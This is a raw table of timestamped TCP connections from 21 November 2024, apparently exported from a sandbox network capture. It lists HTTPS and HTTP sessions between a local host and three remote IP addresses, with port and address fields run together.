                                                                                                                                                                                                            Nov 21, 2024 15:17:28.599442005 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.599450111 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.666027069 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.666776896 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.666820049 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.667382956 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.667391062 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.833633900 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.834108114 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.834151030 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.834549904 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.834561110 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.901422024 CET4434976213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.901496887 CET4434976213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.901578903 CET49762443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.901768923 CET49762443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.901768923 CET49762443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.901792049 CET4434976213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.901806116 CET4434976213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.904335976 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.904392004 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.904484034 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.904613972 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.904633045 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.987926960 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.988023043 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.988105059 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.988291979 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.988337994 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.988368034 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.988384008 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.990947962 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.990987062 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.991269112 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.991401911 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:28.991417885 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.072918892 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.073007107 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.073182106 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.074157000 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.074177027 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.076888084 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.076931953 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.077033043 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.077157021 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.077168941 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.108443975 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.108623981 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.108676910 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.108769894 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.108791113 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.108809948 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.108818054 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.111808062 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.111851931 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.112054110 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.112088919 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.112107992 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.291490078 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.291559935 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.291762114 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.291794062 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.291810989 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.291812897 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.291819096 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.294500113 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.294538021 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.294605970 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.294719934 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.294725895 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.964679003 CET44349761188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.964957952 CET49761443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.976097107 CET49772443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.976151943 CET44349772188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.976347923 CET49772443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.977400064 CET49772443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:29.977422953 CET44349772188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.756464958 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.756999969 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.757018089 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.757400990 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.757406950 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.792372942 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.792846918 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.792876959 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.793324947 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.793333054 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.902955055 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.903507948 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.903526068 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.903995037 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.904001951 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.922492027 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.923000097 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.923026085 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.923495054 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:30.923500061 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.091988087 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.092497110 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.092534065 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.093009949 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.093023062 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.194736004 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.194808006 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.194916964 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.195125103 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.195125103 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.195147991 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.195159912 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.197951078 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.197993994 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.198057890 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.198218107 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.198231936 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.245954990 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.246043921 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.246222973 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.246267080 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.246289968 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.246306896 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.246313095 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.249149084 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.249191046 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.249252081 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.249382973 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.249394894 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.347228050 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.347305059 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.347425938 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.347573996 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.347590923 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.347636938 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.347645044 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.350833893 CET49775443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.350882053 CET4434977513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.350974083 CET49775443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.351159096 CET49775443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.351175070 CET4434977513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.376300097 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.376374006 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.376431942 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.376612902 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.376633883 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.376650095 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.376657963 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.379342079 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.379374981 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.379548073 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.379698992 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.379714966 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.392162085 CET44349772188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.392255068 CET49772443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.393537045 CET49772443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.393564939 CET44349772188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.394649029 CET44349772188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.395991087 CET49772443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.395991087 CET49772443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.396162987 CET44349772188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.535856962 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.535928011 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.536027908 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.536257029 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.536292076 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.536320925 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.536328077 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.539400101 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.539436102 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.539549112 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.539817095 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:31.539832115 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:32.115972996 CET44349772188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:32.116102934 CET44349772188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:32.116158009 CET49772443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:32.116322994 CET49772443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:32.116343975 CET44349772188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:32.116359949 CET49772443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:32.116368055 CET44349772188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:32.127217054 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:32.247010946 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:32.247123003 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:32.247291088 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:32.366784096 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:32.982564926 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:32.983094931 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:32.983122110 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:32.983596087 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:32.983603001 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.029841900 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.030380964 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.030395985 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.030919075 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.030932903 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.201351881 CET4434977513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.202209949 CET49775443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.202239037 CET4434977513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.202908039 CET49775443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.202914000 CET4434977513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.230408907 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.230927944 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.230941057 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.231415033 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.231419086 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.397871971 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.398433924 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.398447990 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.399048090 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.399053097 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.428643942 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.428714991 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.428782940 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.428981066 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.428999901 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.429011106 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.429017067 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.431891918 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.431926966 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.432068110 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.432241917 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.432251930 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.476742029 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.476814985 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.477010012 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.477041006 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.477052927 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.477066040 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.477073908 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.479919910 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.479945898 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.480007887 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.480133057 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.480144978 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.985949993 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.985965967 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.985975027 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.985986948 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.985999107 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986011028 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986022949 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986026049 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986037970 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986052990 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986068010 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986088037 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986097097 CET4434977513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986110926 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986172915 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986219883 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986313105 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986330032 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986381054 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986386061 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986552000 CET4434977513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986588001 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986608028 CET49775443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986663103 CET49775443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986689091 CET4434977513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986706018 CET49775443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986712933 CET4434977513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986852884 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986866951 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986879110 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.986884117 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.987669945 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.987694025 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.987795115 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.987802982 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.991324902 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.991362095 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.991430044 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.991758108 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.991796970 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.991888046 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.992032051 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.992044926 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.992156029 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.992170095 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.992278099 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.992286921 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.992352962 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.992455006 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:33.992461920 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.030764103 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.105947971 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.105978966 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.106038094 CET4977880192.168.2.6185.215.113.16
